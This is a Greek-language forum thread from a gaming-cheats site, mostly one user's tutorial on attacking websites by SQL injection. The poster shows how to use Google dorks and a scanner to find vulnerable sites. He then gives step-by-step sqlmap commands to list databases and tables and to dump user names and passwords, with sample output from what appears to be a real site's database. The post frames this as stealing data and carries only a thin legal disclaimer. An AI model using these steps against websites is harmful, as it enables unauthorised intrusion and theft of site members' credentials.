Jump to content
MaxCheaters Official Group on Discord
Top.MaxCheaters.com is now OPEN – Lineage 2 Top Listing

[GR]SQL Injection -Guide Part 1+2

~Grey Hat~
 Share

Recommended Posts

~Grey Hat~ Newbie

~Grey Hat~

Posted
Posted

Eiσαγωγη

Καλησπερα σε ολα  τα μελη και χαιρομαι που σας βρισκω μιας και ειναι το πρωτο μου ποστ στο section!

Οπως γραφει και στον τιττλο σημερα θα σας δειξω πως κανω εγω sql injection σε μια ιστοσελιδα και υποκλεπτω αρχεια ,κωδικους κτλπ.!

Tι θα χρειαστουμε?

Για να γινει αυτο θα χρειαστουμε λειτουργικο συστημα BackTrack R1!Eιναι λειτουργικο συστημα των Linux!Μη φοβαστε δεν χρειαζεται να βγαλετε τα windows σας η οτι αλλο χρησημοποιειτε!Θα ανεβασω αργοτερα ενα guide για το πως θα το τρεξετε!

Αρχικα πρεπει να βρουμε αν η σελιδα ειναι ευαλωτη σε επιθεσεις, για να το κανουμε αυτο θα χρειαστουμε καποιο προγραμμα! Παρακατω εχω 2 link με τετοια προγραμματα!

Downloads

 

Dork

 

XCodeExploitScanner

Πληροφοριες

Συνεχιζω...εκει που λεει Dork βαζετε τι τυπο σελιδας θελετε να ψαξει πχ αν θελετε για προιοντα inurl:product.php?mid= (θα σας βρει καποια που να σχετιζονται με προιοντα οχι ολα απλα ειναι ενας τροπος για να διαλεξεις που θα επιτεθεις) πατας dork it και σου εμφανιζει σελιδες,μετα Scan SQLi και ανιχνευει αν οι σελιδες ειναι ευαλωτες πατατε στο Open results καντε αντιγραφη και καντε επικολληση σε ενα αρχειο text  το οποιο θα μπορειτε να το κοιταξετε μετα με Backtrack

περιπου καθε μια αναζητηση που κανετε πρεπει να πατατε Show Captcha να βαζετε οτι βλεπετε στην εικονα ετσι ωστε να μην μπλοκαρει την ip σας η Google..

Ξεκινωντας Την Διαδικασια

Λοιπον Ανοιγουμε ενα τερματικο στο backtrack και γραφουμε  

cd /pentest/database/sqlmap

,ωστε να ενεργοποιησουμε το sqlmap.Μετα γραφουμε

./sqlmap.py -u [ url ]--beep

πχ 

./sqlmap.py -u http://www.selidathyma.com --beep

Οταν ακουσετε ενα beep τοτε το sqlmap βρηκε ευαλωτη την σελιδα.Συνεχιζω εδω...μετα γραφουμε

./sqlmap.py -u [ url ] --dbs

π.χ 

./sqlmap.py -u http://www.selidathyma.com --dbs

θα μας εμφανισει τα Database πχ

available databases [6]:

[*] dswa

[*] dswa_stage

[*] dswawordpress

[*] information_schema

[*] mysql

[*] test 

./sqlmap.py -u [ url ] --tables -D [database]

μπορειτε να επιλεξετε οτι database θελετε και γραφετε παλι

πχ 

./sqlmap.py -u http://www.selidathyma.com --tables -D dswa

 

Database: dswa

[table]

[tr]

[td][104 tables]

+-----------------------------------+

| access                         

| accesslog                   

| actions                       

| actions_aid                 

| advanced_help_index 

| authmap                     

| autologout                   

| batch                           

| blocks                         

| blocks_roles               

| boxes                           

| cache                           

| cache_block                     

| cache_content                   

| cache_filter                     

| cache_form                       

| cache_menu                       

| cache_page                       

| cache_update                     

| cache_views                     

| cache_views_data                 

| comments                         

| content_access                   

| content_field_headername         

| content_group                   

| content_group_fields             

| content_node_field               

| content_node_field_instance     

| content_type_education_center_sub

| content_type_find_alliance       

| content_type_member_home_page   

| content_type_member_page         

| content_type_page               

| content_type_page_ns             

| content_type_story               

| dswa_chapters_main               

| dswa_chapters_persons           

| dswa_eventuity_additional       

| dswa_eventuity_link             

| dswa_eventuity_main             

| dswa_profile_additional         

| dswa_profile_geographic         

| dswa_profile_images             

| dswa_profile_main               

| dswa_store_categories           

| dswa_store_featured             

| dswa_store_featured_sample       

| dswa_store_images               

| dswa_store_product_categories   

| dswa_store_products             

| dswa_taq_articles               

| dswa_taq_quotes                 

| dswa_taq_tips                   

| dswa_taq_topics                 

| dswa_teleclasses_additional     

| dswa_teleclasses_main           

| dswa_teleclasses_speakers       

| dswa_whatsnew_main               

| dswa_whatsnew_order             

| fckeditor_role                   

| fckeditor_settings               

| files                           

| filter_formats                   

| filters                         

| flood                           

| history                         

| menu_custom                     

| menu_links                       

| menu_router                     

| node                             

| node_access                     

| node_comment_statistics         

| node_counter                     

| node_revisions                   

| node_type                       

| performance_detail               

| performance_summary             

| permission                       

| profile_fields                   

| profile_values                   

| role                             

| search_dataset                   

| search_index                     

| search_node_links               

| search_total                     

| semaphore                       

| sessions                         

| system                           

| term_data                       

| term_hierarchy                   

| term_node                       

| term_relation                   

| term_synonym                     

| upload                           

| url_alias                       

| users                           

| users_roles                     

| variable                         

| views_display                   

| views_object_cache               

| views_view                       

| vocabulary                       

| vocabulary_node_types           

| watchdog[/td]

[/tr]

[/table]

./sqlmap.py -u [ url ] --columns -T [table name] -D [databasename]

 

Παραδειγμα 

./sqlmap.py -u http://www.selidathyma.com --columns -T user -D dswa

Και αρχιζει βγαζει  τους users...Αλλο παραδειγμα..

./sqlmap.py -u [ url ] --dump -C [column] -T [table name] -D [databasename]

πχ 

./sqlmap.py -u http://www.selidathyma.com --dump  -C pass -T users -D dswa

πχ εγω τωρα στοχευσα να επιτεθω και να ανακτησω ολους τους κωδικους απο τα μελη που ειναι γραμμενα στην σελιδα 8312631.png  <~~~ τσεκαρετε μια να δειτε.

π.χ 

./sqlmap.py -u http://www.selidathyma.com --dump  -C name -T users -D dswa

, και εδω τα ονοματα που εκαναν εγγραφη σε αυτη την σελιδα ~~~> 8312648.png

Και ετσι μπορεις να υποκλεψεις στοιχεια απο διαφορες σελιδες..Τα παραπανω χρησημοποιηθηκαν σε δικο μου συστημα..Αυτος ο οδηγος ειναι παρανομος δεν ευθυνομαι για κακοβουλη χρηση του *ΠΡΟΣΟΧΗ μπορουνε να σας εντοπισουνε και να διωχθειτε ποινικα αν επιτεθειτε σε σελιδα.

Ερχονται καλυτερα ποστ !Ευχαριστω

 

Voqus Newbie

Voqus

Posted
Posted

Ρε φιλε γιατι στον πεοντα κανεις bump εισαι σε tutorial section οχι request.

Εαν ενδιαφερεται καποιος hacking θα κανει reply εδω η θα σε κανει pm.

Jesus.

sτrίkε- Newbie

sτrίkε-

Posted
Posted

Κανω για να ανεβουν λιγο τα ποστ και να επισκεπτοντε περισσοτεροι το section..

Αραξε λιγο φιλαρακο.

Σε καταλαβαινω οτι θελεις να ανεβει το section οπως θα το θελα και εγω, μα με αυτο π κανεις τωρα σκεψου οτι οταν ανεβει θα υπαρχουν αρκετα σχολια του τυπου bump.

 

~Grey Hat~ Newbie

~Grey Hat~

Posted
  • Author
Posted

Αραξε λιγο φιλαρακο.

Σε καταλαβαινω οτι θελεις να ανεβει το section οπως θα το θελα και εγω, μα με αυτο π κανεις τωρα σκεψου οτι οταν ανεβει θα υπαρχουν αρκετα σχολια του τυπου bump.

 

Ok ηταν λαθος! Δεν θα ξαναγινει..Να σου πω , καποιος παιζει με το reputation μου :/ πριν ειχα 1 τωρα 0 ..και νομιζω ξερω ποιος μου το αλλαξε και γιατι...
Celebron Newbie

Celebron

Posted
Posted

Ok ηταν λαθος! Δεν θα ξαναγινει..Να σου πω , καποιος παιζει με το reputation μου :/ πριν ειχα 1 τωρα 0 ..και νομιζω ξερω ποιος μου το αλλαξε και γιατι...

 

http://maxcheaters.com/forum/index.php?action=viewkarma

 

Elfo who else? :S

  • 2 weeks later...
  • 5 months later...
  • 4 weeks later...
  • 3 months later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing


  • Posts

    • Atom
      [L2J] Origins

      By Atom · Posted

      Good luck!
    • Atom
      The Brutal Truth About Lineage 2 That Will Make You Ragequit

      By Atom · Posted

      We are not back on 2005, life in our days is harder than before, in complection with other things yes, L2 has not the same look.
    • bomarket
      CS2 | Buying skins: up to 98% | Buff/UU Sourcing: 1%

      By bomarket · Posted

      Bump
    • JeanVing
      [L2J] Origins

      By JeanVing · Posted

      🌍 https://l2origins.org/ 🛡️ LINEAGE II ORIGINS — SEASON 1 🛡️ 🌑 High Five Classic | True Old-School Experience 🌑 ⚠️ Opening on March 6th at 16:00 Welcome back to the origins of Lineage II. ⚔️ ABOUT THE SERVER Lineage2 Origins is built for players who miss the true retail feeling. Classic progression, real challenges, fair competition — enhanced only with carefully selected QoL features, never breaking the original gameplay. 🌿 PHASED GEAR PROGRESSION 🟢 Month 1: Vesper max 🟢 Month 2: Vorpal unlocked 🟢 Month 3+: Top-grade & Elegia released 🚫 NO AUTO-FARM ✔️ External auto-clicker allowed (1 per client, download page only) ❌ Bots & illegal automation forbidden 🛡️ Strong anti-bot + captcha system ⚠️ AFK players will be punished — stay active or logout 📊 RATES & CORE SETTINGS 🔹 Adena: x5 🔹 Drop / Spoil: x5 🔹 Skill EXP: x15 🔹 Max Windows: 2 per PC 🔹 Subclass: Lv 85 (no quest required) 🔹 Party Level Diff: 30 (55–85) 🔹 No custom items (armors / weapons / jewelry) 🔥 FEATURES ✨ Global & Raid Teleport ✨ NPC Buffer (34 buffs) ✨ Auto Events & PvP Zones ✨ Ranking & Clan Progression ✨ GM Shop & Premium System ✨ All-In-One Community Board ✨ Party & Solo Instances ✨ Siege & Territory War Rewards ✨ RaidBoss Kill Rewards ✨ Lucky Creature Event ✨ Daily Login Rewards ✨ Advanced DDoS Protection & Backups ⚔️ ENCHANTMENTS 🔸 Safe: +3 🔸 Max: +12 (Month 2: +14 | Month 3: +16) 🔸 Blessed: 50% (Premium 65%) 🔸 Normal: 45% (Premium 60%) 🏟️ OLYMPIAD 🔹 Max Enchant: +6 🔹 Start Players: 4 🔹 Period: 1st & 15th 🏰 SIEGE & TW 🔹 Siege Time: 16:00 & 20:00 🔹 Territory War: 20:00 🔹 Max Wards: 3 per Castle 🌌 Lineage2 Origins Fair. Competitive. Nostalgic. A true return to the origins of Lineage II.
    • Espaniolito
      L2J Developer Services and Bug-fixing for Server Owners

      By Espaniolito · Posted

      Bastante confiable, ya trabaje en varios proyectos con el y la verdad te da confianza que hoy en dia poca gente hay asi lo  recomiendo 100%  Gracias por todo amigo ! seguiremos trabajando juntos segurisimamente! 

  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..